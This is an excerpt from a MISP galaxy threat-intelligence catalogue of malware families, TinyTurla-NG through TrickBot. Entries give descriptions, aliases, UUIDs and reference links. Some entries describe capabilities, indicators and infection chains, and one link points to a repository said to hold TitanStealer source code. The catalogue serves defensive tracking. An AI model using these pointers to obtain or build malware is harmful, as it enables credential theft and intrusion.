- https://asec.ahnlab.com/en/32781/ - webarchive
- https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702 - webarchive
- https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/ - webarchive
- https://krebsonsecurity.com/tag/nuclear-bot/ - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html - webarchive
- https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/ - webarchive
- https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet - webarchive
- https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyTurlaNG
Cisco Talos states that TinyTurla-NG is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems. TinyTurla-NG was seen as early as December 2023 targeting a Polish non-governmental organization (NGO) working on improving Polish democracy and supporting Ukraine during the Russian invasion.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyTurlaNG.
Known Synonyms |
---|
TTNG |
Internal MISP references
UUID 1b560d5a-1335-4a28-b50f-1d0a7bbbbf80
which can be used as unique global reference for TinyTurlaNG
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyTyphon
Internal MISP references
UUID d2414f4a-1eda-4d80-84d3-ed130ca14e3c
which can be used as unique global reference for TinyTyphon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyZbot
Internal MISP references
UUID b933634f-81d0-41ef-bf2f-ea646fc9e59c
which can be used as unique global reference for TinyZbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot - webarchive
- https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf - webarchive
- https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyTurla
Talos describes this as a malware family with very scoped functionality and thus a small code footprint, likely used as a second chance backdoor.
Internal MISP references
UUID e1fa6d45-4ac9-4ace-98a9-e21947f0e497
which can be used as unique global reference for TinyTurla
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla - webarchive
- https://infosec.exchange/@SophosXOps/111109357153515214 - webarchive
- https://blog.talosintelligence.com/2021/09/tinyturla.html - webarchive
- https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tiop
Internal MISP references
UUID c34091df-0df2-4ef6-bf69-c67eb711f6d8
which can be used as unique global reference for Tiop
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TitanStealer
The stealer is written in Go and capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files.
Internal MISP references
UUID 0a98f387-885e-4ad4-b5ab-686f4c06dcf1
which can be used as unique global reference for TitanStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.titan_stealer - webarchive
- https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign - webarchive
- https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html - webarchive
- https://github.com/D4NTESCODE/TitanStealerSource - webarchive
- https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tmanger
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tmanger.
Known Synonyms |
---|
LuckyBack |
Internal MISP references
UUID 8d7108fe-65be-4853-945d-1d5376dbaa34
which can be used as unique global reference for Tmanger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger - webarchive
- https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager - webarchive
- https://www.youtube.com/watch?v=1WfPlgtfWnQ - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/?utm_source=rss&utm_medium=rss&utm_campaign=apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ - webarchive
- https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger - webarchive
- https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/ - webarchive
- https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf - webarchive
- https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op - webarchive
- https://vblocalhost.com/uploads/VB2020-20.pdf - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/ - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tofsee
According to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more.
Cyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tofsee.
Known Synonyms |
---|
Gheg |
Internal MISP references
UUID 53e617fc-d71e-437b-a1a1-68b815d1ff49
which can be used as unique global reference for Tofsee
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee - webarchive
- https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-2-inmemoryconfig-store-vaccine/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet - webarchive
- https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html - webarchive
- https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/ - webarchive
- https://www.cert.pl/en/news/single/tofsee-en/ - webarchive
- https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/ - webarchive
- https://blog.talosintelligence.com/tofsee-spam/ - webarchive
- https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897~.asp - webarchive
- https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining - webarchive
- https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/ - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf - webarchive
- https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/ - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TokyoX
Internal MISP references
UUID ad23afb8-cfce-4e43-b73f-58ca20fa0afe
which can be used as unique global reference for TokyoX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
tomiris
Internal MISP references
UUID a5449893-ab06-419b-bb31-4ce16503dcd9
which can be used as unique global reference for tomiris
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tomiris - webarchive
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/ - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TONEDEAF
TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.
Internal MISP references
UUID 77e29e3a-d4a3-4692-b1f8-38ad6dc1af1d
which can be used as unique global reference for TONEDEAF
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf - webarchive
- https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/ - webarchive
- https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/ - webarchive
- https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TONERJAM
According to Symantec, Grager was deployed against three organizations in Taiwan, Hong Kong, and Vietnam in April 2024. Analysis of the backdoor revealed that it used the Graph API to communicate with a C&C server hosted on Microsoft OneDrive. Grager was downloaded from a typosquatted URL mimicking the open-source file archiver 7-Zip.
Internal MISP references
UUID a52be1e0-eb2b-4115-9f14-9e822341210b
which can be used as unique global reference for TONERJAM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TONESHELL
Internal MISP references
UUID 83bfa615-a1d4-4b61-bda0-beb560d24a97
which can be used as unique global reference for TONESHELL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.toneshell - webarchive
- https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html - webarchive
- https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/ - webarchive
- https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/ - webarchive
- https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ - webarchive
- https://hitcon.org/2024/CMT/slides/Sailing_the_Seven_SEAs_Deep_Dive_into_Polaris_Arsenal_and_Intelligence_Insights.pdf - webarchive
- https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/ - webarchive
- https://hunt.io/blog/toneshell-backdoor-used-to-target-attendees-of-the-iiss-defence-summit - webarchive
- https://github.com/Still34/landing/blob/master/assets/slides/2024-08-Sailing%20the%20Seven%20SEAs.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tonnerre
Internal MISP references
UUID a7590aa5-d9fb-449f-8a5e-5233077b736e
which can be used as unique global reference for Tonnerre
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tonnerre - webarchive
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf - webarchive
- https://research.checkpoint.com/2021/after-lightning-comes-thunder/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Topinambour
Internal MISP references
UUID fcc49738-f801-47ff-977b-9e368bc85273
which can be used as unique global reference for Topinambour
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Torisma
Torisma is a complex HTTP(S) downloader that can serve as an orchestrator handling the execution of additional payloads from the C&C server.
It uses VEST-32 for encryption and decryption of network traffic between the client and the server.
Typically, it uses these parameter names for its HTTP POST requests: ACTION, CODE, CACHE, REQUEST, RES. It sends the victim's MAC address in the initial request.
The response of the server informing the client about a successful authentication is "Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}". The client then requests additional data from the server, which decrypts to shellcode and its data parameters and is executed. The client also creates a named pipe, \\.\pipe\fb4d1181bb09b484d058768598b, that allows inter-process communication with the executed shellcode.
Torisma was usually downloaded by NedDnLoader, and deployed in the Operation DreamJob campaigns starting around Q4 2019.
Internal MISP references
UUID 69860c07-2acb-4674-8e68-41a1d8fe958a
which can be used as unique global reference for Torisma
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma - webarchive
- https://www.telsy.com/lazarus-gate/ - webarchive
- http://blog.nsfocus.net/stumbzarus-apt-lazarus/ - webarchive
- https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/ - webarchive
- https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TorrentLocker
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TorrentLocker.
Known Synonyms |
---|
Teerac |
Internal MISP references
UUID 7f6cd579-b021-4896-80da-fcc07c35c8b2
which can be used as unique global reference for TorrentLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TorLoader
Downloader, delivered via a lure with fake exploits published on Github.
Internal MISP references
UUID b6c84477-198f-42ea-808b-e20b23271cd0
which can be used as unique global reference for TorLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TOUCHMOVE
Internal MISP references
UUID 39ecb19e-790b-475b-85db-ef4c7f9c9dce
which can be used as unique global reference for TOUCHMOVE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TOUCHSHIFT
Internal MISP references
UUID accbbc7e-43f1-4232-90be-6c1fe90cbccf
which can be used as unique global reference for TOUCHSHIFT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ToxicEye
ToxicEye is a ransomware that spreads through phishing emails. The malware encrypts system files with AES-256 and demands a ransom in Bitcoin.
Internal MISP references
UUID 0d445373-d520-4b67-9066-72f23452c774
which can be used as unique global reference for ToxicEye
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye - webarchive
- https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/ - webarchive
- https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TransBox
According to Trend Micro, this is a backdoor abusing the Dropbox API, used by threat actor Earth Yako.
Internal MISP references
UUID e4d4af34-835a-4e39-b9e2-eb2456e5fce3
which can be used as unique global reference for TransBox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
tRat
tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.
Internal MISP references
UUID b9e6e4bd-57e8-44e7-853c-8dcb83c26079
which can be used as unique global reference for tRat
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.trat - webarchive
- https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TreasureHunter
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TreasureHunter.
Known Synonyms |
---|
huntpos |
Internal MISP references
UUID f9d85edd-caa9-4134-9396-4575e70b10f2
which can be used as unique global reference for TreasureHunter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter - webarchive
- https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/ - webarchive
- https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html - webarchive
- http://adelmas.com/blog/treasurehunter.php - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TrickBot
A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. It has multiple modules, including VNC and a Socks5 proxy, and uses SSL for C2 communication.
Timeline:
- Q4 2016 - Detected in the wild Oct 2016; 1st report 2017; Trickbot primarily uses Necurs as vehicle for installs.
- Jan 2018 - Use of XMRIG (Monero) miner
- Feb 2018 - Bitcoin theft
- Mar 2018 - Unfinished ransomware module
- Q3/4 2018 - Trickbot starts being spread through Emotet.
Infection vectors:
1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot
2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot
3. Phish > Attached MS Office > Macro Enabled > Trickbot installed
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TrickBot.
Known Synonyms |
---|
TheTrick |
TrickLoader |
Trickster |
Internal MISP references
UUID c824813c-9c79-4917-829a-af72529e8329
which can be used as unique global reference for TrickBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot - webarchive
- https://community.riskiq.com/article/111d6005/description - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/ - webarchive
- https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/ - webarchive
- https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/ - webarchive
- https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6 - webarchive
- https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://blog.fraudwatchinternational.com/malware/trickbot-malware-works - webarchive
- https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/ - webarchive
- https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/ - webarchive
- https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass - webarchive
- https://www.netscout.com/blog/asert/dropping-anchor - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-blackburn - webarchive
- https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html - webarchive
- https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737 - webarchive
- https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ - webarchive
- https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf - webarchive
- https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/ - webarchive
- https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks - webarchive
- https://intel471.com/blog/conti-emotet-ransomware-conti-leaks - webarchive
- https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/ - webarchive
- https://www.wired.co.uk/article/trickbot-malware-group-internal-messages - webarchive
- https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization - webarchive
- https://www.youtube.com/watch?v=EyDiIAt__dI - webarchive
- https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/ - webarchive
- https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works - webarchive
- https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/ - webarchive
- https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware - webarchive
- https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html - webarchive
- https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html - webarchive
- https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/ - webarchive
- https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/ - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://content.fireeye.com/m-trends/rpt-m-trends-2020 - webarchive
- https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/ - webarchive
- https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html - webarchive
- https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf - webarchive
- https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/ - webarchive
- https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/ - webarchive
- https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 - webarchive
- https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-swathmore - webarchive
- https://blog.lumen.com/a-look-inside-the-trickbot-botnet/ - webarchive
- https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/ - webarchive
- https://therecord.media/russian-trickbot-malware-developer-pleads-guilty - webarchive
- https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ - webarchive
- https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/ - webarchive
- https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html - webarchive
- https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/ - webarchive
- https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them - webarchive
- https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/ - webarchive
- https://nattothoughts.substack.com/p/ransom-war-russian-extortion-operations - webarchive
- https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows - webarchive
- https://intel471.com/blog/conti-leaks-ransomware-development - webarchive
- https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure - webarchive
- https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors - webarchive
- https://community.riskiq.com/article/04ec92f4 - webarchive
- https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/ - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf - webarchive
- https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf - webarchive
- https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573 - webarchive
- https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal - webarchive
- https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader - webarchive
- https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/ - webarchive
- https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - webarchive
- https://duo.com/decipher/trickbot-up-to-its-old-tricks - webarchive
- https://twitter.com/VK_Intel/status/1328578336021483522 - webarchive
- https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a - webarchive
- https://labs.vipre.com/trickbots-tricks/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/ - webarchive
- https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ - webarchive
- https://twitter.com/anthomsec/status/1321865315513520128 - webarchive
- https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/ - webarchive
- http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html - webarchive
- https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/ - webarchive
- https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/ - webarchive
- https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users - webarchive
- https://www.youtube.com/watch?v=EdchPEHnohw - webarchive
- https://blog.talosintelligence.com/2020/03/trickbot-primer.html - webarchive
- https://www.cert.pl/en/news/single/detricking-trickbot-loader/ - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/ - webarchive
- https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/ - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf - webarchive
- https://redcanary.com/resources/webinars/deep-dive-process-injection/ - webarchive
- https://www.splunk.com/en_us/blog/security/detecting-trickbots.html - webarchive
- https://www.youtube.com/watch?v=Brx4cygfmg8 - webarchive
- https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ - webarchive
- https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html - webarchive
- https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412 - webarchive
- https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html - webarchive
- https://unit42.paloaltonetworks.com/banking-trojan-techniques/ - webarchive
- https://cofenselabs.com/all-you-need-is-text-second-wave/ - webarchive
